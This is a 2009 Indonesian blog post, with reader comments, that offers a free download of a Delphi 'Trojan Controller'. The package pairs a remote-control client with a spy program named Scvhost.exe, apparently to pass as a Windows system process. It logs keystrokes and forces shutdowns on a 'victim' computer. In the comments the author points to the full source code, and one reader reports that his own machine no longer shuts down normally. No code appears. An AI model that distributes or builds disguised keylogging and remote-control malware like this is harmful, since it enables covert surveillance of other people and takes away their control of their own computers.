Trojan Controller Ver 1.0 With Delphi (Original Post)

12 06 2009

Trojan Controller Ver 1.0 adalah sebuah aplikasi berbasis jaringan yang di buat dengan delphi 6. Terdiri dari 2 buah aplikasi yaitu ThClient (Aplikasi Pengendali) dan Scvhost.exe (Aplikasi mata-mata yang di jalankan pada komputer korban)

Fungsi aplikasi :

ThClient = Berfungsi sebagai pengendali, mengendalikan (shutdown, reboot, play ghost sound, warning message, dll) / remote komputer lain dalam suatu jaringan (PC Remoter) dan juga dapat membaca ketikan keyboard komputer lain (Keylogger Reader)

Scvhost.exe = Berfungsi sebagai aplikasi mata-mata di komputer lain, yang nantinya aplikasi ini di jalankan pada komputer yang ingin di kendalikan.

DOWNLOAD NOW (FREE)

Berikut Screenshoot aplikasinya :

nb: Aplikasi ini mohon digunakan secara bijaksana, penulis tidak bertanggung jawab apabila aplikasi ini digunakan untuk hal-hal yang berbau kajahatan, kriminal, dan sejenisnya. Tulisan ini hanya sebagai media pembelajaran semata……

Refferensi :

Note :

Untuk menghindari adanya tindak plagiatisme karya, diharapkan “Menyertakan Link dan atau atribut penulis.” Copy – Paste Boleh asalkan sesuai dengan aturan yang ada.

Silahkan Baca Link Berikut :

http://anotherfool.wordpress.com/jacp/

http://pernakpernikblog.blogspot.com/2007/04/etika-copy-paste.html

Regards,


Actions

Information

14 responses

16 06 2009
aanmind

mas…di kasih sourch codenya donk. jadi kita bisa tambah semangat belajarnya

17 06 2009
heru widakdo

mbak / mas aanmind source code kan udah ada di postingan2 sebelumnya…..
trojan controller ini merupakan gabungan dari posting2 sebelumnya, antara lain: Remote shutdown sederhana, trus online keylogger (server side)
berikut link2nya: http://widakdo.co.cc/?p=247 , http://widakdo.co.cc/?p=79 , http://widakdo.co.cc/?cat=1&paged=3

semua udah saya post lengkap dengan source code dan keterangannya…tinggal anda modifikasi sesuai keperluan….
Saya juga sama2 belajar kok….

7 07 2009
REYNALDI

bisagak agar tidak delphi aja tutorial programnya sekali-sekali vb 6.0 ya

18 11 2009
adhe

mas heru, link untuk melihat source kodex niy tdk bisa, klo boleh di posting ulang ya mas..
thanks.

19 11 2009
heru widakdo

OK, maaf sudah lama tidak saya check link2 lama dikarenakan blog ini pindah alamat / pindah domain dari widakdo.co.cc ke widakdo.web.id

Untuk mendapatkan source code project tsb di webblog ini, anda dapat menemukan potongan-potongan project ini secara terpisah, antara lain dengan judul:
-> Remote Shutdown Sederhana
-> Online Keylogger (Server Side)
-> Dll
(memang saya posting secara terpisah)

Tetapi jika saudara ingin postingan lengkap source code (dlm bentuk delphi project) ini dapat mendownload tulisan saya di http://ilmukomputer.org/author/heruwidakdo/

Thanks, dan Selamat Berkarya……

15 04 2010
Bowwow

Ok dech Mas… infonya sangat membantu…

15 04 2010
heru widakdo

Sama-sama om… Thanks For Ur Visit….

16 04 2010
andrew

terima kasih ya atas Scvhost.exe-nya

16 04 2010
heru widakdo

@andrew : sama2 bro, makasi jg udah mampir dan berkenan memberikan comment…

9 05 2010
john

Your program’s very helpfully….

Thanks You

10 05 2010
heru widakdo

Ok, thanks you too for ur visit….

18 06 2010
sam

mas setelah saya download dan jalankan.. koq terus komputer saya ga bisa di shutdown secara wajar ya?

18 06 2010
heru widakdo

@sam : yang anda jalankan tuh aplikasi yg mana mas ??? kalo yg scvhost.exe memang begitu…..

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: